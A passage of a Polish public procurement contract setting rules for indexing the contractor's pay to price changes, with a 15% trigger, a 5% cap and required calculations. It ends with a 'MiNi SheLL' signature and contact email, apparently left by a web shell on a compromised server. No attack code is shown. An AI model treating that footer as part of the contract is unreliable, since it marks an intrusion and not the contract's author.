Zwiększenie wynagrodzenia nastąpi w przypadku gdy skumulowany wzrost cen począwszy od miesiąca w którym zawarto umowę, na moment złożenia wniosku przez stronę, będzie większy niż 15%.<br/>Zmniejszenie wynagrodzenia nastąpi w przypadku gdy skumulowany spadek cen, począwszy od miesiąca w którym zawarto umowę na moment złożenia wniosku przez stronę, będzie większy niż 15%.<br/>5) Waloryzacji podlegać będzie wyłącznie wynagrodzenie należne Wykonawcy za usługi pozostałe do wykonania <br/>w okresie podlegającym waloryzacji, to jest usługi pozostałe do wykonania począwszy od dnia złożenia wniosku o waloryzację wynagrodzenia.<br/>6) Sposób określenia wpływu zmiany kosztów na koszt wykonania zamówienia: Strona występująca z wnioskiem o zmianę wynagrodzenia musi wykazać, że zmiana użytych do realizacji zamówienia kosztów względem kosztów przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie wynika ze zmiany wskaźnika GUS i miała faktyczny wpływ na koszty wykonania zamówienia. Tym samym wniosek ten musi zawierać propozycję zmiany wysokości wynagrodzenia wraz z uzasadnieniem oraz dokumenty niezbędne do oceny, w szczególności:<br/>a) szczegółową kalkulację proponowanej zmienionej wysokości wynagrodzenia Wykonawcy oraz wykazanie adekwatności propozycji do zmiany wysokości kosztów wykonania zamówienia przez Wykonawcę, wraz z określeniem kategorii (rodzaju) i wartości kosztów, przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie lub ustalonego w wyniku poprzedniej waloryzacji, których zmiana może uzasadniać wystąpienie z wnioskiem o zmianę wynagrodzenia oraz sposób obliczania ich zmiany i prezentacji obliczeń. Przedstawiona kalkulacja musi w sposób niebudzący wątpliwości wykazywać wpływ zmiany wskaźnika korygującego na wysokość dotychczas stosowanych cen materiałów lub kosztów w rozliczeniach Stron;<br/>b) dokumenty potwierdzające zasadność wystąpienia z wnioskiem (w szczególności, jego zgodność z zasadami zmiany wynagrodzenia określonymi w niniejszym ustępie) oraz prawidłowość obliczeń w zakresie zmiany wysokości kosztów wykonania umowy oraz wnioskowanej zmiany wysokości wynagrodzenia Wykonawcy.<br/>7) Łączna maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający wynosi 5% wynagrodzenia całkowitego brutto.<br/>8) Wykonawca, którego wynagrodzenie zostało zmienione zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, o ile przedmiotem umowy z podwykonawcą są usługi, a okres obowiązywania umowy przekracza 6 miesięcy pod rygorem kary umownej o której mowa w § 10 ust. 1 pkt 2 lit. d).

Creat By MiNi SheLL
Email: jattceo@gmail.com